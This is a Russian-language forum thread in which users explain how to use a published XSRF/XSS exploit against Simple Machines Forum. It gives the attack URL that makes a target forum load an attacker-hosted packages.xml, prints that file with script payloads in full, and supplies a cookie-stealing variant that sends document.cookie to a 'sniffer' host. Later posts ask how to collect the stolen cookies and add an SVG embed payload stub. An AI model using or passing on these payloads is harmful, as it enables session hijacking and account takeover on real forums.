Подскажите, как использовать данный эксплойт. Схема действий, хотя бы вкратце..

http://www.exploit-db.com/exploits/7866

Я понимаю, что наверняка много подобных тем, но в поиске почти ничего не нашел... Буду очень благодарен.

http://атакуемыйсайт.com/index.php?action=packageget;sa=browse;absolute=htt p://твой сайт.com

а на нем файл packages.xml
с таким вот содержанием:

<?xml version="1.0"?>
<!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
<!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
XSRF SMF PoC By Xianur0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

<package-list xmlns="http://www.simplemachines.org/xml/package-list"
xmlns:smf="http://www.simplemachines.org/">
<list-title>Xianur0 Was Here</list-title>

<section>
<title>SMF XSS PoC By Xianur0</title>
<text><![CDATA[<script>alert('XSS')</script>]]></text>
<modification>
<id>Xianur0:XSMF</id>
<name>SMF PoC By Xianur0</name>
<filename>smfexploit.zip</filename>
<version>0.1</version>
<author email="uxmal666@gmail.com">Xianur0</author>
<description><![CDATA[<script>alert(document.cookie)</script>]]></description>
</modification>
</section>
</package-list>



эммм... как бэ вроде так

эммм... как бэ вроде так

это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?

<text><![CDATA[<script>alert('XSS')</script>]]></text>

<text><![CDATA[<script>img = new Image(); img.src = "http://адрес сниффера/img.gif?"+document.cookie;</script>]]></text>

можно так...

это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?


Это уже к сплоиту не имеет отношения. Читай статьи про XSS.

плиз как использовать данный script ,как сделать ссылку на снифер в данной ситуации,Спасибо.


<EMBED SRC="data:image/svg+xml;base64,как сделать ссылку на снифер" type="image/svg+xml" AllowScriptAccess="always"></EMBED>